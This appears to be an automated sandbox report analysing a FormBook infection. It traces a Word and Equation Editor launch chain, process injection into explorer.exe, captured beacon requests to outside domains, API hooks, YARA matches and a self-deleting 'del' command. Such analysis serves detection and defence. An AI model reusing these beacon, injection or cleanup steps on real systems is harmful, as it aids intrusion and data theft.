                                                            TimestampkBytes transferredDirectionData
                                                            Nov 25, 2021 17:25:22.961991072 CET785OUTGET /9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 HTTP/1.1
                                                            Host: www.mountfrenchlodge.net
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Nov 25, 2021 17:25:23.079817057 CET785INHTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Thu, 25 Nov 2021 16:25:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "6192576d-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.224916734.102.136.18080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 25, 2021 17:25:43.527704000 CET786OUTGET /9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 HTTP/1.1
                                                            Host: www.cuteprofessionalscrubs.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Nov 25, 2021 17:25:43.645796061 CET787INHTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Thu, 25 Nov 2021 16:25:43 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "6192576d-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                            Code Manipulations

                                                            User Modules

                                                            Hook Summary

                                                            Function NameHook TypeActive in Processes
                                                            PeekMessageAINLINEexplorer.exe
                                                            PeekMessageWINLINEexplorer.exe
                                                            GetMessageWINLINEexplorer.exe
                                                            GetMessageAINLINEexplorer.exe

                                                            Processes

                                                            Process: explorer.exe, Module: USER32.dll
                                                            Function NameHook TypeNew Data
                                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE5
                                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE5
                                                            GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE5
                                                            GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE5

                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            Analysis Process: WINWORD.EXE PID: 2592 Parent PID: 596

                                                            General

                                                            Start time:17:24:12
                                                            Start date:25/11/2021
                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                            Imagebase:0x13f420000
                                                            File size:1423704 bytes
                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Chronological Activities

                                                            Analysis Process: EQNEDT32.EXE PID: 1592 Parent PID: 596

                                                            General

                                                            Start time:17:24:14
                                                            Start date:25/11/2021
                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                            Imagebase:0x400000
                                                            File size:543304 bytes
                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Chronological Activities

                                                            Analysis Process: vbc.exe PID: 2652 Parent PID: 1592

                                                            General

                                                            Start time:17:24:17
                                                            Start date:25/11/2021
                                                            Path:C:\Users\Public\vbc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\Public\vbc.exe"
                                                            Imagebase:0x1090000
                                                            File size:739840 bytes
                                                            MD5 hash:075BD1E3E3E0C01794EE6A84BE2C585A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            Chronological Activities

                                                            Analysis Process: vbc.exe PID: 2412 Parent PID: 2652

                                                            General

                                                            Start time:17:24:20
                                                            Start date:25/11/2021
                                                            Path:C:\Users\Public\vbc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\Public\vbc.exe
                                                            Imagebase:0x1090000
                                                            File size:739840 bytes
                                                            MD5 hash:075BD1E3E3E0C01794EE6A84BE2C585A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            Chronological Activities

                                                            Analysis Process: explorer.exe PID: 1764 Parent PID: 2412

                                                            General

                                                            Start time:17:24:23
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0xffa10000
                                                            File size:3229696 bytes
                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high

                                                            Chronological Activities

                                                            Analysis Process: raserver.exe PID: 1892 Parent PID: 2412

                                                            General

                                                            Start time:17:24:53
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\SysWOW64\raserver.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\raserver.exe
                                                            Imagebase:0x480000
                                                            File size:101888 bytes
                                                            MD5 hash:0842FB9AC27460E2B0107F6B3A872FD5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate

                                                            Chronological Activities

                                                            Analysis Process: cmd.exe PID: 772 Parent PID: 1892

                                                            General

                                                            Start time:17:24:55
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del "C:\Users\Public\vbc.exe"
                                                            Imagebase:0x4a120000
                                                            File size:302592 bytes
                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Chronological Activities

                                                            Disassembly

                                                            Code Analysis

                                                            Reset < >

                                                              Analysis Process: vbc.exe PID: 2652 Parent PID: 1592 vbc.exeCOMMON

                                                              Executed Functions

                                                              Function 0045C70C, Relevance: 1.8, APIs: 1, Instructions: 326processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0045C9DF
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 72ae37fa481bb399222495922559c416fc3da0c2c166c3f11245e154582c4248
                                                              • Instruction ID: 258d410a73e198bd7cbb97cc30bc9634e4af665f04257f3c9d83f5586b774855
                                                              • Opcode Fuzzy Hash: 72ae37fa481bb399222495922559c416fc3da0c2c166c3f11245e154582c4248
                                                              • Instruction Fuzzy Hash: FDC11470D002198FDF20DFA4C881BEEBBB1BB49305F1095AAD859B7241DB749A89CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0045C718, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0045C9DF
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 50b1e25844ef9aa687959892b44145814f9e4705b574090b58c56dc3ee4ef512
                                                              • Instruction ID: 32658f6e996a0bd4df50fff343987eb848e4947fee8fafa54cb96328e3057a37
                                                              • Opcode Fuzzy Hash: 50b1e25844ef9aa687959892b44145814f9e4705b574090b58c56dc3ee4ef512
                                                              • Instruction Fuzzy Hash: F4C10370D002198FDB20DFA4C881BEEBBB1BB49305F1095AAD859B7241DB749A89CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0045C378, Relevance: 1.6, APIs: 1, Instructions: 121injectionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0045C453
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: a394f4197bd90f9f5228321bf9e0348d6f3150ae15cef7041b20c288306c2756
                                                              • Instruction ID: a57091df161a9bd0ef88b33c3250f7d1fa616b7e7c2986b85db8942e5cd324bf
                                                              • Opcode Fuzzy Hash: a394f4197bd90f9f5228321bf9e0348d6f3150ae15cef7041b20c288306c2756
                                                              • Instruction Fuzzy Hash: F1419AB4D012589FCF10CFA9D984AEEBBF1BF49304F24942AE815B7250D778AA45CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0045C380, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0045C453
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 51cbfc4f0375a46cd489b991660850c66592d543895b095bc6e1fb361bbd0a27
                                                              • Instruction ID: efe95af8a21371752da6fc53c39f125d052eb0edde32f79b81519f2967142be8
                                                              • Opcode Fuzzy Hash: 51cbfc4f0375a46cd489b991660850c66592d543895b095bc6e1fb361bbd0a27
                                                              • Instruction Fuzzy Hash: 4E41ACB4D012589FCF10CFA9D884AEEFBF1BB49304F24942AE814B7240D738AA45CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0045C4D8, Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0045C592
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 731c08a74f90100c2363409a7592a70f3bc7667ee8de768e68c521296d3722c7
                                                              • Instruction ID: 9251cabb5403f879a92007e93a86ce76b64d7b9a21b839520df64b61b28e06b0
                                                              • Opcode Fuzzy Hash: 731c08a74f90100c2363409a7592a70f3bc7667ee8de768e68c521296d3722c7
                                                              • Instruction Fuzzy Hash: FF41A9B8D002589FCF10CFA9D884AEEFBB5BB49314F14942AE815B7240D734A945CFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0045C4E0, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0045C592
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 7bf1e17fc194716292ce24780b5586531c5f2dfde0ff316dcc0cfe2b36b3075b
                                                              • Instruction ID: 7b917cbc131ccf54ec5c314fdc0f55423aa6f7e4aae14d83a48a194aee5f10d0
                                                              • Opcode Fuzzy Hash: 7bf1e17fc194716292ce24780b5586531c5f2dfde0ff316dcc0cfe2b36b3075b
                                                              • Instruction Fuzzy Hash: 124198B9D00258DFCF10CFA9D884AEEFBB5BB49314F14942AE815B7200D775A946CFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0045C251, Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0045C302
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: b298354171dd132b691bf34675fd6a83d8dd96d4b8985462ec84b58ac581a62f
                                                              • Instruction ID: 8412a715e8df9eb0b87cc4004c66dd2f74ec849d723bfc290a595f11a0917657
                                                              • Opcode Fuzzy Hash: b298354171dd132b691bf34675fd6a83d8dd96d4b8985462ec84b58ac581a62f
                                                              • Instruction Fuzzy Hash: 5341AAB8D002589FCF10CFA9D880ADEBBB5FF49314F14942AE815BB200D735A906CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0045C258, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0045C302
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 32c3436bc789c12575d9df00ab88dbb44dd8e99c890f626412d19997fe551b68
                                                              • Instruction ID: 159befe9df9c20a7c146b2c9675f0b90f0e921c49f89df38ef5ff7026b8df76c
                                                              • Opcode Fuzzy Hash: 32c3436bc789c12575d9df00ab88dbb44dd8e99c890f626412d19997fe551b68
                                                              • Instruction Fuzzy Hash: 1A4199B9D002589FCF10CFA9D884ADEBBB5FB49314F10942AE815B7200D735A946CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0045C120, Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0045C1D7
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 740143732a88259ef9b6ca1510218f5ea3f7f0923cab913b029944a227e6b877
                                                              • Instruction ID: 2c072192511e99837c6b8958b29b9ee6d23d41da04059ba576074b3c36530457
                                                              • Opcode Fuzzy Hash: 740143732a88259ef9b6ca1510218f5ea3f7f0923cab913b029944a227e6b877
                                                              • Instruction Fuzzy Hash: 5141BDB4D012589FCB10CFA9D884AEEBBF5BF49314F24842AE815B7241D738A949CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0045C128, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0045C1D7
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: d21c0f32d51a738b6181473650c8ac71aca84cf35a0da99bf15349f6eae8eaa5
                                                              • Instruction ID: fa4194d31068483f7b62709db6254bbd3387ab2b9616b41f8b9d1cdf7ae000af
                                                              • Opcode Fuzzy Hash: d21c0f32d51a738b6181473650c8ac71aca84cf35a0da99bf15349f6eae8eaa5
                                                              • Instruction Fuzzy Hash: 6E41BCB4D002189FCB10CFA9D884AEEBBB1BB49314F24842AE815B7241D738A949CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0045C031, Relevance: 1.6, APIs: 1, Instructions: 78threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ResumeThread.KERNELBASE(?), ref: 0045C0B6
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 67b45918742405ae4fe7dc843251c5a814fe6aa95995c4703f035360aa9e55a2
                                                              • Instruction ID: 157197abb5de34d812deb669b06af6d917a663c9d231e295c3d2b1c50f25d6fe
                                                              • Opcode Fuzzy Hash: 67b45918742405ae4fe7dc843251c5a814fe6aa95995c4703f035360aa9e55a2
                                                              • Instruction Fuzzy Hash: D731AAB4D01258AFCB14CFA9E884ADEFBB5FB4A314F14942AE815B7340D735A906CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0045C038, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ResumeThread.KERNELBASE(?), ref: 0045C0B6
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413862447.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 8f05746c88a33f90e37d46efd2a53c24b41b21884b764cd425b2e45667f38feb
                                                              • Instruction ID: 2ee64cdc5d0f7a2342dec15630cb80db0a97ac66ba4ce3f14b8cf12df679669b
                                                              • Opcode Fuzzy Hash: 8f05746c88a33f90e37d46efd2a53c24b41b21884b764cd425b2e45667f38feb
                                                              • Instruction Fuzzy Hash: 3131A9B4D012189FCF14CFA9D884ADEFBB5BB49314F24942AE815B7340D735A906CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0018D01C, Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413774877.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e03d47d829af3607288df63ed07f78307781e9f24ef6af17c8cf31474a0cad44
                                                              • Instruction ID: 8c39aed12491136a6fa39428a6e4b4a6e9cfbb4335809c430bfc2ffb5c560235
                                                              • Opcode Fuzzy Hash: e03d47d829af3607288df63ed07f78307781e9f24ef6af17c8cf31474a0cad44
                                                              • Instruction Fuzzy Hash: 9721F275604304DFDB14EF64E884B16BB65EB84314F20C9A9E80A4B286C736D947CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0018D017, Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.413774877.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 705ada77aa18427fb7566f6aff9062515466c3b2fc1146b9a875443394fb7337
                                                              • Instruction ID: dced52790ccc31726afdda55bd08a01545abc807c79c0391c66b6a3635918a42
                                                              • Opcode Fuzzy Hash: 705ada77aa18427fb7566f6aff9062515466c3b2fc1146b9a875443394fb7337
                                                              • Instruction Fuzzy Hash: 8811BE75504380CFCB11DF14E584B15BB61FB44314F24C6A9E8094B696C33AD90ACFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0017D1C1, Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
